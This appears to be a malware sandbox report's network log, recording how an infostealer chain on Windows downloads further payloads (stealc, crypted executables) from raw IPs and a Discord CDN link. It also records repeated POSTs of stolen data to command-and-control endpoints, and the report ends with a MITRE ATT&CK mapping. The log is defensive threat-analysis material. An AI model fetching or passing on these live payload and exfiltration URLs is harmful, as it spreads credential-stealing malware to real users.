Cross-Origin-Opener-Policy: same-origin; report-to="cacerts"
Report-To: {"group":"cacerts","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/cacerts"}]}
Content-Length: 1739
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 0
Date: Sat, 31 Aug 2024 10:35:07 GMT
Expires: Sat, 31 Aug 2024 11:25:07 GMT
Cache-Control: public, max-age=3000
Age: 364
Last-Modified: Mon, 08 Jul 2024 07:38:00 GMT
Content-Type: application/pkix-crl
Vary: Accept-Encoding
GET

http://c.pki.goog/r/r4.crl

Shipment.pif

Remote address:

142.250.178.3:80

Request

GET /r/r4.crl HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/10.0
Host: c.pki.goog

Response

HTTP/1.1 200 OK

Accept-Ranges: bytes
Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/cacerts
Cross-Origin-Resource-Policy: cross-origin
Cross-Origin-Opener-Policy: same-origin; report-to="cacerts"
Report-To: {"group":"cacerts","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/cacerts"}]}
Content-Length: 436
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 0
Date: Sat, 31 Aug 2024 10:06:29 GMT
Expires: Sat, 31 Aug 2024 10:56:29 GMT
Cache-Control: public, max-age=3000
Age: 2082
Last-Modified: Thu, 25 Jul 2024 14:48:00 GMT
Content-Type: application/pkix-crl
Vary: Accept-Encoding
DNS

3.178.250.142.in-addr.arpa

Remote address:

8.8.8.8:53

Request

3.178.250.142.in-addr.arpa

IN PTR

Response

3.178.250.142.in-addr.arpa

IN PTR

lhr48s27-in-f31e100net
DNS

3.178.250.142.in-addr.arpa

Remote address:

8.8.8.8:53

Request

3.178.250.142.in-addr.arpa

IN PTR

Response

3.178.250.142.in-addr.arpa

IN PTR

lhr48s27-in-f31e100net
DNS

156.143.67.172.in-addr.arpa

Remote address:

8.8.8.8:53

Request

156.143.67.172.in-addr.arpa

IN PTR

Response
DNS

156.143.67.172.in-addr.arpa

Remote address:

8.8.8.8:53

Request

156.143.67.172.in-addr.arpa

IN PTR

Response
GET

http://194.58.114.223/d/385107

Shipment.pif

Remote address:

194.58.114.223:80

Request

GET /d/385107 HTTP/1.1
Host: 194.58.114.223

Response

HTTP/1.1 302 Found

Server: nginx
Date: Sat, 31 Aug 2024 10:41:13 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Keep-Alive: timeout=120
Location: https://cdn.discordapp.com/attachments/1274634716451967060/1279369983616487515/setup.exe?ex=66d431a5&is=66d2e025&hm=f41442d80495f6a2b7fa4f70e7ef73da8776008d0846edb0aacd7623c35305fc&
DNS

cdn.discordapp.com

Shipment.pif

Remote address:

8.8.8.8:53

Request

cdn.discordapp.com

IN A

Response

cdn.discordapp.com

IN A

162.159.130.233

cdn.discordapp.com

IN A

162.159.135.233

cdn.discordapp.com

IN A

162.159.134.233

cdn.discordapp.com

IN A

162.159.129.233

cdn.discordapp.com

IN A

162.159.133.233
DNS

223.114.58.194.in-addr.arpa

Remote address:

8.8.8.8:53

Request

223.114.58.194.in-addr.arpa

IN PTR

Response
GET

https://cdn.discordapp.com/attachments/1274634716451967060/1279369983616487515/setup.exe?ex=66d431a5&is=66d2e025&hm=f41442d80495f6a2b7fa4f70e7ef73da8776008d0846edb0aacd7623c35305fc&

Shipment.pif

Remote address:

162.159.130.233:443

Request

GET /attachments/1274634716451967060/1279369983616487515/setup.exe?ex=66d431a5&is=66d2e025&hm=f41442d80495f6a2b7fa4f70e7ef73da8776008d0846edb0aacd7623c35305fc& HTTP/1.1
Host: cdn.discordapp.com
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Date: Sat, 31 Aug 2024 10:41:19 GMT
Content-Type: application/x-msdos-program
Content-Length: 7596943
Connection: keep-alive
CF-Ray: 8bbc68502b3379bb-LHR
CF-Cache-Status: HIT
Accept-Ranges: bytes, bytes
Age: 3614
Cache-Control: public, max-age=31536000
Content-Disposition: attachment; filename="setup.exe"
ETag: "14a56f81287d1e037fc6405247c31d20"
Expires: Sun, 31 Aug 2025 10:41:19 GMT
Last-Modified: Sat, 31 Aug 2024 09:19:33 GMT
Vary: Accept-Encoding
alt-svc: h3=":443"; ma=86400
x-goog-generation: 1725095973738607
x-goog-hash: crc32c=AFcygg==
x-goog-hash: md5=FKVvgSh9HgN/xkBSR8MdIA==
x-goog-metageneration: 1
x-goog-storage-class: STANDARD
x-goog-stored-content-encoding: identity
x-goog-stored-content-length: 7596943
x-guploader-uploadid: AD-8ljsQQKNQOvYPXyBJ0r5uLPzVcEs4oApRA79saHlUgASPmzlXUFwjbJ5pAWA8BDcNYH2p8crwcvIQlg
X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
Set-Cookie: __cf_bm=5G5.6JTOfVBLoACgsNdIvZrNGM5yq53m6R0vPZVgMDc-1725100879-1.0.1.1-gWoedcYp60RePcnJJaIhDv7H1dQz2iV7L1X81ldliQ_3WbtQY3smhegBqVVyRyhXfw0IYZQtiJq4ygwVWxj7KA; path=/; expires=Sat, 31-Aug-24 11:11:19 GMT; domain=.discordapp.com; HttpOnly; Secure
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FI7YDh91KZ0S4djXadImOX8OqtF7E9oSK%2BuTWIa2w5HOc4V%2F8RJXPazq%2ByKECbgNntOyhB1aaaegquOTrGND6MxSZ1IJC8UNU1h%2FN0iMbES3gaPLOo2lDxWOK39mErfcet6%2Fxg%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Set-Cookie: _cfuvid=rS9iu37ZvaLcjVjiRquWCqL8tnzx_hZyuSA0i1ERKxo-1725100879423-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
Server: cloudflare
DNS

233.130.159.162.in-addr.arpa

Remote address:

8.8.8.8:53

Request

233.130.159.162.in-addr.arpa

IN PTR

Response
DNS

tvexv20ht.top

Channel1.exe

Remote address:

8.8.8.8:53

Request

tvexv20ht.top

IN A

Response

tvexv20ht.top

IN A

194.87.248.136
DNS

tvexv20ht.top

Channel1.exe

Remote address:

8.8.8.8:53

Request

tvexv20ht.top

IN A

Response

tvexv20ht.top

IN A

194.87.248.136
POST

http://tvexv20ht.top/v1/upload.php

Channel1.exe

Remote address:

194.87.248.136:80

Request

POST /v1/upload.php HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Content-Type: multipart/form-data; boundary=----Boundary13258892
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Content-Length: 413
Host: tvexv20ht.top

Response

HTTP/1.1 200 OK

server: nginx/1.24.0 (Ubuntu)
date: Sat, 31 Aug 2024 10:41:19 GMT
content-type: text/plain; charset=utf-8
content-length: 2
etag: W/"2-nOO9QiTIwXgNtWtBJezz8kv3SLc"
POST

http://tvexv20ht.top/v1/upload.php

Channel1.exe

Remote address:

194.87.248.136:80

Request

POST /v1/upload.php HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Content-Type: multipart/form-data; boundary=----Boundary23560543
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Content-Length: 78040
Host: tvexv20ht.top

Response

HTTP/1.1 200 OK

server: nginx/1.24.0 (Ubuntu)
date: Sat, 31 Aug 2024 10:41:23 GMT
content-type: text/plain; charset=utf-8
content-length: 2
etag: W/"2-nOO9QiTIwXgNtWtBJezz8kv3SLc"
POST

http://tvexv20ht.top/v1/upload.php

Channel1.exe

Remote address:

194.87.248.136:80

Request

POST /v1/upload.php HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Content-Type: multipart/form-data; boundary=----Boundary62969090
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Content-Length: 77115
Host: tvexv20ht.top

Response

HTTP/1.1 200 OK

server: nginx/1.24.0 (Ubuntu)
date: Sat, 31 Aug 2024 10:41:27 GMT
content-type: text/plain; charset=utf-8
content-length: 2
etag: W/"2-nOO9QiTIwXgNtWtBJezz8kv3SLc"
DNS

136.248.87.194.in-addr.arpa

Remote address:

8.8.8.8:53

Request

136.248.87.194.in-addr.arpa

IN PTR

Response

136.248.87.194.in-addr.arpa

IN PTR

ptrruvdscom
DNS

136.248.87.194.in-addr.arpa

Remote address:

8.8.8.8:53

Request

136.248.87.194.in-addr.arpa

IN PTR

Response

136.248.87.194.in-addr.arpa

IN PTR

ptrruvdscom

185.215.113.16:80

http://185.215.113.16/Jo89Ku7d/index.php

http

axplong.exe

457.9kB
13.6MB
9760
9742

HTTP Request

POST http://185.215.113.16/Jo89Ku7d/index.php

HTTP Response

200

HTTP Request

POST http://185.215.113.16/Jo89Ku7d/index.php

HTTP Response

200

HTTP Request

POST http://185.215.113.16/Jo89Ku7d/index.php

HTTP Response

200

HTTP Request

GET http://185.215.113.16/inc/crypteda.exe

HTTP Response

200

HTTP Request

POST http://185.215.113.16/Jo89Ku7d/index.php

HTTP Response

200

HTTP Request

POST http://185.215.113.16/Jo89Ku7d/index.php

HTTP Response

200

HTTP Request

GET http://185.215.113.16/inc/stealc_default2.exe

HTTP Response

200

HTTP Request

POST http://185.215.113.16/Jo89Ku7d/index.php

HTTP Response

200

HTTP Request

POST http://185.215.113.16/Jo89Ku7d/index.php

HTTP Response

200

HTTP Request

GET http://185.215.113.16/inc/BitcoinCore.exe

HTTP Response

200

HTTP Request

POST http://185.215.113.16/Jo89Ku7d/index.php

HTTP Response

200

HTTP Request

POST http://185.215.113.16/Jo89Ku7d/index.php

HTTP Response

200

HTTP Request

POST http://185.215.113.16/Jo89Ku7d/index.php

HTTP Response

200

HTTP Request

POST http://185.215.113.16/Jo89Ku7d/index.php

HTTP Response

200

HTTP Request

GET http://185.215.113.16/inc/runtime.exe

HTTP Response

200

HTTP Request

POST http://185.215.113.16/Jo89Ku7d/index.php

HTTP Response

200

HTTP Request

POST http://185.215.113.16/Jo89Ku7d/index.php

HTTP Response

200
63.32.161.232:80

http://ddl.safone.dev/3831777/setup.exe?hash=AgADKw

http

axplong.exe

713.5kB
21.4MB
15354
15350

HTTP Request

GET http://ddl.safone.dev/3823166/crypted.exe?hash=AgADZl

HTTP Response

200

HTTP Request

GET http://ddl.safone.dev/3827530/caesium-image-compressor.exe?hash=AgADPx

HTTP Response

200

HTTP Request

GET http://ddl.safone.dev/3803980/whiteheroin.exe?hash=AgADjF

HTTP Response

404

HTTP Request

GET http://ddl.safone.dev/3830515/PureSyncInst.exe?hash=AgADvR

HTTP Response

200

HTTP Request

GET http://ddl.safone.dev/3831777/setup.exe?hash=AgADKw

HTTP Response

200
95.179.250.45:26212

RegAsm.exe

2.4MB
47.8kB
1753
928
185.215.113.26:80

http://185.215.113.26/Nework.exe

http

axplong.exe

15.2kB
439.0kB
326
318

HTTP Request

GET http://185.215.113.26/Nework.exe

HTTP Response

200
65.21.18.51:45580

OfLLdqx0bP.exe

2.1MB
30.8kB
1523
523
185.215.113.26:80

http://185.215.113.26/Dem7kTu/index.php

http

Hkbsse.exe

1.1kB
667 B
14
6

HTTP Request

POST http://185.215.113.26/Dem7kTu/index.php

HTTP Response

200

HTTP Request

POST http://185.215.113.26/Dem7kTu/index.php

HTTP Response

200
95.216.107.53:12311

TL5gaXPKXp.exe

1.9MB
34.5kB
1501
520
185.215.113.17:80

http://185.215.113.17/2fb6c2cc8dce150a.php

http

stealc_default2.exe

199.3kB
5.4MB
3917
3904

HTTP Request

GET http://185.215.113.17/

HTTP Response

200

HTTP Request

POST http://185.215.113.17/2fb6c2cc8dce150a.php

HTTP Response

200

HTTP Request

POST http://185.215.113.17/2fb6c2cc8dce150a.php

HTTP Response

200

HTTP Request

POST http://185.215.113.17/2fb6c2cc8dce150a.php

HTTP Response

200

HTTP Request

POST http://185.215.113.17/2fb6c2cc8dce150a.php

HTTP Response

200

HTTP Request

POST http://185.215.113.17/2fb6c2cc8dce150a.php

HTTP Response

200

HTTP Request

GET http://185.215.113.17/f1ddeb6592c03206/sqlite3.dll

HTTP Response

200

HTTP Request

POST http://185.215.113.17/2fb6c2cc8dce150a.php

HTTP Response

200

HTTP Request

POST http://185.215.113.17/2fb6c2cc8dce150a.php

HTTP Response

200

HTTP Request

GET http://185.215.113.17/f1ddeb6592c03206/freebl3.dll

HTTP Response

200

HTTP Request

GET http://185.215.113.17/f1ddeb6592c03206/mozglue.dll

HTTP Response

200

HTTP Request

GET http://185.215.113.17/f1ddeb6592c03206/msvcp140.dll

HTTP Response

200

HTTP Request

GET http://185.215.113.17/f1ddeb6592c03206/nss3.dll

HTTP Response

200

HTTP Request

GET http://185.215.113.17/f1ddeb6592c03206/softokn3.dll

HTTP Response

200

HTTP Request

GET http://185.215.113.17/f1ddeb6592c03206/vcruntime140.dll

HTTP Response

200

HTTP Request

POST http://185.215.113.17/2fb6c2cc8dce150a.php

HTTP Response

200

HTTP Request

POST http://185.215.113.17/2fb6c2cc8dce150a.php

HTTP Response

200

HTTP Request

POST http://185.215.113.17/2fb6c2cc8dce150a.php

HTTP Response

200

HTTP Request

POST http://185.215.113.17/2fb6c2cc8dce150a.php

HTTP Response

200

HTTP Request

POST http://185.215.113.17/2fb6c2cc8dce150a.php

HTTP Response

200

HTTP Request

POST http://185.215.113.17/2fb6c2cc8dce150a.php

HTTP Response

200
172.67.162.113:443

https://femininedspzmhu.shop/api

tls, http

BitLockerToGo.exe

1.0kB
4.6kB
9
9

HTTP Request

POST https://femininedspzmhu.shop/api

HTTP Response

200
104.21.58.213:443

https://locatedblsoqp.shop/api

tls, http

BitLockerToGo.exe

1.0kB
4.6kB
9
9

HTTP Request

POST https://locatedblsoqp.shop/api

HTTP Response

200
172.67.177.240:443

https://traineiwnqo.shop/api

tls, http

BitLockerToGo.exe

1.8kB
10.0kB
15
17

HTTP Request

POST https://traineiwnqo.shop/api

HTTP Response

200

HTTP Request

POST https://traineiwnqo.shop/api

HTTP Response

200
69.57.172.44:443

https://cgil.in/storage/openvpn12.exe

tls, http

axplong.exe

1.1kB
5.8kB
16
11

HTTP Request

GET https://cgil.in/storage/openvpn12.exe

HTTP Response

404
104.21.58.213:443

https://locatedblsoqp.shop/api

tls, http

BitLockerToGo.exe

1.0kB
4.6kB
9
9

HTTP Request

POST https://locatedblsoqp.shop/api

HTTP Response

200
172.67.177.240:443

https://traineiwnqo.shop/api

tls, http

BitLockerToGo.exe

1.8kB
10.0kB
15
17

HTTP Request

POST https://traineiwnqo.shop/api

HTTP Response

200

HTTP Request

POST https://traineiwnqo.shop/api

HTTP Response

200
185.215.113.19:80

http://185.215.113.19/CoreOPT/index.php

http

Shipment.pif

736 B
1.0kB
6
5

HTTP Request

POST http://185.215.113.19/CoreOPT/index.php

HTTP Response

200

HTTP Request

POST http://185.215.113.19/CoreOPT/index.php

HTTP Response

200
185.215.113.19:80

http://185.215.113.19/CoreOPT/index.php

http

Shipment.pif

258.1kB
49.9kB
3614
736

HTTP Request

POST http://185.215.113.19/CoreOPT/index.php?scr=1

HTTP Response

200

HTTP Request

POST http://185.215.113.19/CoreOPT/index.php

HTTP Response

200

HTTP Request

POST http://185.215.113.19/CoreOPT/index.php

HTTP Response

200

HTTP Request

POST http://185.215.113.19/CoreOPT/index.php

HTTP Response

200

HTTP Request

POST http://185.215.113.19/CoreOPT/index.php

HTTP Response

200

HTTP Request

POST http://185.215.113.19/CoreOPT/index.php

HTTP Response

200
103.130.147.211:80

http://103.130.147.211/Files/channel2.exe

http

Shipment.pif

234.5kB
6.8MB
4927
4924

HTTP Request

GET http://103.130.147.211/Files/channel2.exe

HTTP Response

200
172.67.193.102:443

https://jirafasaltas.fun/shopexd.asp?bz6lc4t394br=eFhwIFemrMF%2FVQdnWgR2UbCKGWfZtBWZRJvXMMLoeVpaAXHaE0GBuUMO5s2rsXKU

tls, http

BitcoinCore.exe

1.1kB
4.2kB
9
8

HTTP Request

POST https://jirafasaltas.fun/shopexd.asp?bz6lc4t394br=eFhwIFemrMF%2FVQdnWgR2UbCKGWfZtBWZRJvXMMLoeVpaAXHaE0GBuUMO5s2rsXKU

HTTP Response

204
150.171.27.10:443

tse1.mm.bing.net

tls, http2

1.2kB
6.9kB
15
13
150.171.27.10:443

tse1.mm.bing.net

tls, http2

1.2kB
6.9kB
15
13
150.171.27.10:443

tse1.mm.bing.net

tls, http2

1.2kB
6.9kB
15
13
150.171.27.10:443

https://tse1.mm.bing.net/th?id=OADD2.10239317301626_12UQHHQXE25HHMLCY&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90

tls, http2

105.1kB
3.0MB
2208
2205

HTTP Request

GET https://tse1.mm.bing.net/th?id=OADD2.10239340418581_1PW4UWMX6DVDU64ZR&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90

HTTP Request

GET https://tse1.mm.bing.net/th?id=OADD2.10239360608910_1R4TEUG1LRQY39K7S&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90

HTTP Request

GET https://tse1.mm.bing.net/th?id=OADD2.10239360608909_1XWUMGMD2M0J0LDVR&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90

HTTP Request

GET https://tse1.mm.bing.net/th?id=OADD2.10239317301217_1LGEUWZHPMKMEMITB&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90

HTTP Request

GET https://tse1.mm.bing.net/th?id=OADD2.10239340418582_18ZLZW09JZ7BHXRKX&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Request

GET https://tse1.mm.bing.net/th?id=OADD2.10239317301626_12UQHHQXE25HHMLCY&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90

HTTP Response

200
150.171.27.10:443

tse1.mm.bing.net

tls, http2

1.2kB
6.9kB
15
13
45.200.149.147:80

http://45.200.149.147/BowExpert.exe

http

Shipment.pif

48.4kB
1.5MB
1049
1047

HTTP Request

GET http://45.200.149.147/BowExpert.exe

HTTP Response

200
103.130.147.211:80

http://103.130.147.211/Files/Channel1.exe

http

Shipment.pif

241.8kB
6.9MB
4931
4928

HTTP Request

GET http://103.130.147.211/Files/Channel1.exe

HTTP Response

200
195.133.13.230:80

http://thixv13ht.top/v1/upload.php

http

channel2.exe

227.3kB
2.9kB
172
51

HTTP Request

POST http://thixv13ht.top/v1/upload.php

HTTP Response

200

HTTP Request

POST http://thixv13ht.top/v1/upload.php

HTTP Response

200

HTTP Request

POST http://thixv13ht.top/v1/upload.php

HTTP Response

200
172.67.143.156:443

https://2x.si/PQP.exe

tls, http

Shipment.pif

32.8kB
762.2kB
561
558

HTTP Request

GET https://2x.si/PQP.exe

HTTP Response

200
142.250.178.3:80

http://c.pki.goog/r/r4.crl

http

Shipment.pif

510 B
3.8kB
6
5

HTTP Request

GET http://c.pki.goog/r/gsr1.crl

HTTP Response

200

HTTP Request

GET http://c.pki.goog/r/r4.crl

HTTP Response

200
194.58.114.223:80

http://194.58.114.223/d/385107

http

Shipment.pif

330 B
1.7kB
6
5

HTTP Request

GET http://194.58.114.223/d/385107

HTTP Response

302
162.159.130.233:443

https://cdn.discordapp.com/attachments/1274634716451967060/1279369983616487515/setup.exe?ex=66d431a5&is=66d2e025&hm=f41442d80495f6a2b7fa4f70e7ef73da8776008d0846edb0aacd7623c35305fc&

tls, http

Shipment.pif

277.9kB
7.8MB
5633
5627

HTTP Request

GET https://cdn.discordapp.com/attachments/1274634716451967060/1279369983616487515/setup.exe?ex=66d431a5&is=66d2e025&hm=f41442d80495f6a2b7fa4f70e7ef73da8776008d0846edb0aacd7623c35305fc&

HTTP Response

200
194.87.248.136:80

http://tvexv20ht.top/v1/upload.php

http

Channel1.exe

161.6kB
2.1kB
124
37

HTTP Request

POST http://tvexv20ht.top/v1/upload.php

HTTP Response

200

HTTP Request

POST http://tvexv20ht.top/v1/upload.php

HTTP Response

200

HTTP Request

POST http://tvexv20ht.top/v1/upload.php

HTTP Response

200

8.8.8.8:53

104.219.191.52.in-addr.arpa

dns

73 B
147 B
1
1

DNS Request

104.219.191.52.in-addr.arpa
8.8.8.8:53

172.214.232.199.in-addr.arpa

dns

74 B
128 B
1
1

DNS Request

172.214.232.199.in-addr.arpa
8.8.8.8:53

ddl.safone.dev

dns

axplong.exe

60 B
175 B
1
1

DNS Request

ddl.safone.dev

DNS Response

63.32.161.232

54.247.69.169

52.212.52.84
8.8.8.8:53

43.58.199.20.in-addr.arpa

dns

71 B
157 B
1
1

DNS Request

43.58.199.20.in-addr.arpa
8.8.8.8:53

16.113.215.185.in-addr.arpa

dns

73 B
133 B
1
1

DNS Request

16.113.215.185.in-addr.arpa
8.8.8.8:53

232.161.32.63.in-addr.arpa

dns

72 B
135 B
1
1

DNS Request

232.161.32.63.in-addr.arpa
8.8.8.8:53

217.106.137.52.in-addr.arpa

dns

73 B
147 B
1
1

DNS Request

217.106.137.52.in-addr.arpa
8.8.8.8:53

45.250.179.95.in-addr.arpa

dns

72 B
120 B
1
1

DNS Request

45.250.179.95.in-addr.arpa
8.8.8.8:53

26.113.215.185.in-addr.arpa

dns

73 B
133 B
1
1

DNS Request

26.113.215.185.in-addr.arpa
8.8.8.8:53

51.18.21.65.in-addr.arpa

dns

70 B
125 B
1
1

DNS Request

51.18.21.65.in-addr.arpa
8.8.8.8:53

53.107.216.95.in-addr.arpa

dns

72 B
129 B
1
1

DNS Request

53.107.216.95.in-addr.arpa
8.8.8.8:53

17.113.215.185.in-addr.arpa

dns

73 B
133 B
1
1

DNS Request

17.113.215.185.in-addr.arpa
8.8.8.8:53

232.168.11.51.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

232.168.11.51.in-addr.arpa
8.8.8.8:53

femininedspzmhu.shop

dns

BitLockerToGo.exe

66 B
98 B
1
1

DNS Request

femininedspzmhu.shop

DNS Response

172.67.162.113

104.21.66.172
8.8.8.8:53

50.23.12.20.in-addr.arpa

dns

70 B
156 B
1
1

DNS Request

50.23.12.20.in-addr.arpa
8.8.8.8:53

171.39.242.20.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

171.39.242.20.in-addr.arpa
8.8.8.8:53

locatedblsoqp.shop

dns

BitLockerToGo.exe

64 B
96 B
1
1

DNS Request

locatedblsoqp.shop

DNS Response

104.21.58.213

172.67.207.182
8.8.8.8:53

traineiwnqo.shop

dns

BitLockerToGo.exe

124 B
94 B
2
1

DNS Request

traineiwnqo.shop

DNS Request

traineiwnqo.shop

DNS Response

172.67.177.240

104.21.67.155
8.8.8.8:53

213.58.21.104.in-addr.arpa

dns

72 B
134 B
1
1

DNS Request

213.58.21.104.in-addr.arpa
8.8.8.8:53

113.162.67.172.in-addr.arpa

dns

73 B
135 B
1
1

DNS Request

113.162.67.172.in-addr.arpa
8.8.8.8:53

240.177.67.172.in-addr.arpa

dns

73 B
135 B
1
1

DNS Request

240.177.67.172.in-addr.arpa
8.8.8.8:53

cgil.in

dns

axplong.exe

53 B
69 B
1
1

DNS Request

cgil.in

DNS Response

69.57.172.44
8.8.8.8:53

44.172.57.69.in-addr.arpa

dns

71 B
116 B
1
1

DNS Request

44.172.57.69.in-addr.arpa
8.8.8.8:53

40.13.222.173.in-addr.arpa

dns

72 B
137 B
1
1

DNS Request

40.13.222.173.in-addr.arpa
8.8.8.8:53

205.47.74.20.in-addr.arpa

dns

71 B
157 B
1
1

DNS Request

205.47.74.20.in-addr.arpa
8.8.8.8:53

IuUBYrPCAO.IuUBYrPCAO

dns

Shipment.pif

67 B
142 B
1
1

DNS Request

IuUBYrPCAO.IuUBYrPCAO
8.8.8.8:53

evoliutwoqm.shop

dns

BitLockerToGo.exe

62 B
62 B
1
1

DNS Request

evoliutwoqm.shop
8.8.8.8:53

48.229.111.52.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

48.229.111.52.in-addr.arpa
8.8.8.8:53

jirafasaltas.fun

dns

BitcoinCore.exe

124 B
188 B
2
2

DNS Request

jirafasaltas.fun

DNS Request

jirafasaltas.fun

DNS Response

172.67.193.102

104.21.57.227

DNS Response

104.21.57.227

172.67.193.102
8.8.8.8:53

19.113.215.185.in-addr.arpa

dns

73 B
133 B
1
1

DNS Request

19.113.215.185.in-addr.arpa
8.8.8.8:53

211.147.130.103.in-addr.arpa

dns

148 B
324 B
2
2

DNS Request

211.147.130.103.in-addr.arpa

DNS Request

211.147.130.103.in-addr.arpa
8.8.8.8:53

102.193.67.172.in-addr.arpa

dns

73 B
135 B
1
1

DNS Request

102.193.67.172.in-addr.arpa
8.8.8.8:53

tse1.mm.bing.net

dns

62 B
170 B
1
1

DNS Request

tse1.mm.bing.net

DNS Response

150.171.27.10

150.171.28.10
8.8.8.8:53

147.149.200.45.in-addr.arpa

dns

143 B
271 B
2
2

DNS Request

147.149.200.45.in-addr.arpa

DNS Request

8.167.79.40.in-addr.arpa
8.8.8.8:53

CvcMEMMQKdoWtsiZdkN.CvcMEMMQKdoWtsiZdkN

dns

Intake.pif

170 B
320 B
2
2

DNS Request

CvcMEMMQKdoWtsiZdkN.CvcMEMMQKdoWtsiZdkN

DNS Request

CvcMEMMQKdoWtsiZdkN.CvcMEMMQKdoWtsiZdkN
8.8.8.8:53

thixv13ht.top

dns

channel2.exe

118 B
150 B
2
2

DNS Request

thixv13ht.top

DNS Request

thixv13ht.top

DNS Response

195.133.13.230

DNS Response

195.133.13.230
8.8.8.8:53

230.13.133.195.in-addr.arpa

dns

73 B
125 B
1
1

DNS Request

230.13.133.195.in-addr.arpa
8.8.8.8:53

2x.si

dns

Shipment.pif

51 B
83 B
1
1

DNS Request

2x.si

DNS Response

172.67.143.156

104.21.27.222
8.8.8.8:53

c.pki.goog

dns

Shipment.pif

56 B
107 B
1
1

DNS Request

c.pki.goog

DNS Response

142.250.178.3
8.8.8.8:53

3.178.250.142.in-addr.arpa

dns

144 B
220 B
2
2

DNS Request

3.178.250.142.in-addr.arpa

DNS Request

3.178.250.142.in-addr.arpa
8.8.8.8:53

156.143.67.172.in-addr.arpa

dns

146 B
270 B
2
2

DNS Request

156.143.67.172.in-addr.arpa

DNS Request

156.143.67.172.in-addr.arpa
8.8.8.8:53

cdn.discordapp.com

dns

Shipment.pif

64 B
144 B
1
1

DNS Request

cdn.discordapp.com

DNS Response

162.159.130.233

162.159.135.233

162.159.134.233

162.159.129.233

162.159.133.233
8.8.8.8:53

223.114.58.194.in-addr.arpa

dns

73 B
130 B
1
1

DNS Request

223.114.58.194.in-addr.arpa
8.8.8.8:53

233.130.159.162.in-addr.arpa

dns

74 B
136 B
1
1

DNS Request

233.130.159.162.in-addr.arpa
8.8.8.8:53

tvexv20ht.top

dns

Channel1.exe

118 B
150 B
2
2

DNS Request

tvexv20ht.top

DNS Request

tvexv20ht.top

DNS Response

194.87.248.136

DNS Response

194.87.248.136
8.8.8.8:53

136.248.87.194.in-addr.arpa

dns

146 B
200 B
2
2

DNS Request

136.248.87.194.in-addr.arpa

DNS Request

136.248.87.194.in-addr.arpa

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

Persistence

Scheduled Task/Job

T1053

Scheduled Task

Privilege Escalation

Scheduled Task/Job

T1053

Scheduled Task

Defense Evasion

Indirect Command Execution

T1202

Modify Registry

T1112

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Virtualization/Sandbox Evasion

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Process Discovery

T1057

Query Registry

System Information Discovery

System Location Discovery

T1614

System Language Discovery

T1614.001

Virtualization/Sandbox Evasion